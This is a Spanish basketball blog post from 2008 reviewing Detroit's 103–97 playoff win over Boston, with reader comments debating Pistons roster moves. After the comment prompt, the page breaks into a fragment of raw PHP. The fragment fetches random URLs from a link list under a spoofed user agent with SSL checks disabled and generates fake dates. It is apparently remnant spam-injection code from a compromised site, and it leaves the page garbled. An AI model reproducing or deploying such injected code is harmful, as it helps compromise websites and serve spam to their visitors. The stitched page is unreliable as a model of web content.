No es suficiente (DET 103 – BOS 97)

23 de May de 2008 por TheDeerHunter

Malas noticias para Boston. Anoche aprendieron una dolorosa lección. No sólo se confirmó que para ser campeón de la NBA no es suficiente con ganar casi todos los partidos en casa, como ya seguramente sabían sino que además, anoche Detroit les enseñó que para ser campeón no es suficiente con el Big Three funcionando a pleno rendimiento. Y esto es lo verdaderamente grave para ellos.

Anoche, por fin, Ray Allen despertó de su letargo. 25 puntos con muy buenos porcentajes de tiro. Por primera vez durante estos playoffs todos los astros se alinearon para que además, Garnett y Pierce coincidieran con él haciendo sus buenos números (24 y 26 puntos respectivamente también con buenos porcentajes e importantes aportaciones en el rebote y las asistencias). A los 75 puntos de estos tres monstruos se unió Rajon Rondo con una importante labor de intendencia rozando el triple doble… ¿Qué pudo fallar entonces? La que ha sido una de las principales armas de Boston durante la liga regular, su defensa, no logró apenas inquietar a Detroit y el banquillo estuvo extremadamente flojo, como viene siendo habitual en esta postemporada.

En Detroit, Billups mostrando todavía algunos gestos de dolor ( ¿reales? ) hizo un partido completísimo. A partir de ahí, como siempre cuando su líder está bien, todo el equipo funcionando a velocidad crucero, en su línea, sin demasiados alardes. Todos los titulares en dobles figuras más Stuckey que está aportando minutos importantísimos. Únicamente llama la atención la anecdótica presencia de Maxiell, que sí llevaba una buena línea de juego hasta llegar a esta eliminatoria. Con todo mostraron las vergüenzas de la hasta ahora insuperable defensa de Boston en su fortín.

En realidad, esto no debería ser un drama para los Celtics. Tan sólo deberían recuperar sus sensaciones de toda la temporada como mejor equipo visitante de la competición que han sido. El problema es que se han acostumbrado a otra cosa y se ven obligados a cambiar el chip de nuevo pero en el peor momento del mundo y contra el peor rival del mundo. Mimbres tienen para lograrlo.

Comenta

8 comentarios a esta entrada

  1. Dantley dice:
    #1

    Esto será largo, aunque Detroit ha vuelto a demostrar el valor del equipo. Hamilton ha llegado en el mejor momento de la temporada y eso lo notan los Pistons. Me ha extrañado que Maxiell juegue menos teniendo en cuenta que hay que cuidar a McNice y Sheed y que Maxiell ya lo había hecho bien en playoffs.

    Mientras, Stuckey sigue creciendo. Si se repitiera el draft del 2007 hoy, Stuckey debería ir el 4. Preocupa menos lo de Billups

      Citar

  2. telekoman dice:
    #2

    De hecho, si se consigue el anillo (y eso es mucho decir), es el momento de tradear a Billups por un interior joven a algún equipo con urgencias.

      Citar

  3. TheDeerHunter dice:
    #3

    No puedo creer que ese comentario haya salido de las cabeza de un piston. :O

    Correré un tupido velo

      Citar

  4. Gallis dice:
    #4

    Teleko, cuando dices traspasar a Billups, en realidad quieres decir renovarle y hacerle una estatua, no??? 🙂

      Citar

  5. xapa_croack dice:
    #5

    Pues si la nba desea la ansiada final boston la, habra que hacer algun robo en el palacio.

      Citar

  6. Dantley dice:
    #6

    Pues mira, yo que como es evidente por muchas cosas soy fan total de Stuckey, mantenía a Billups. Tiene 31 años y acaba contrato dentro de 3 temporadas. Tener una pareja Billups-Stuckey de 1 te garantiza 3 años de felicidad. Quizá hoy la distribución de minutos de base es 34-14, el año que viene 30-18, al siguiente 18-30 … y además aprendiendo de un jugador como Billups cuyo rendimiento está por encima de su talento.

    Otra cosa es que aparezcan los egos, que no sé cómo andará Stuckey de eso. Siempre puede completar minutos jugando de 2, aunque siempre tengo dudas sobre si un jugador puede rendir de 1 y de 2 consistentemente toda una temporada.

    Ahora, a Sheed y McDyess hay que buscarle sustitutos. Maxiell da para aportar algo, a Amir Johnson lo siguen cuidando y dará sus frutos, pero sí es cierto que algo más hará falta.

      Citar

  7. telekoman dice:
    #7

    Pues no te creas. Evidentemente, el año que viene, Billups seguirá siendo mucho mejor base que Stuckey. Ahora bien, el año que viene, o si queréis el siguiente y llegamos a una solución de compromiso, ¿quién será más apetecible Billups o Sheed? ¿Por quien vas a sacar una pieza mejor? Es decir, partiendo de la premisa de que este año ganamos el anillo, el año que viene (o el siguiente) empezamos una transición manteniendo la posición buena que ya tenemos con Stuckey y reforzamos con un buen pilar una más floja en el interior. De esa forma, cuando el relevo de Sheed sea necesario, ya no tienes que hacer la de Dios para tener un pivot decente. En lugar de recostrucción, haces un cambio progresivo. Es una idea que evidentemente pasa por ganar el anillo este año y pensar que en el siguiente (o el otro) vas a tener un año no muy bueno pero no pasar por la travesía por el desierto.

      Citar

  8. Viva_Dirk dice:
    #8

    Ninguna de las 2 es una mala lectura, seguramente esperaría al siguiente verano que hay unos cuantos agentes libres restringidos que pedirán mas de lo que a su equipo le gustaría dar, vease Villanueva o Marvin Williams, y en ambos equipos seguramente estarian encantados de contar con Billups.

    En cuanto a la eliminatoria, ahora es cuando se pone realmente interesante!!!!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>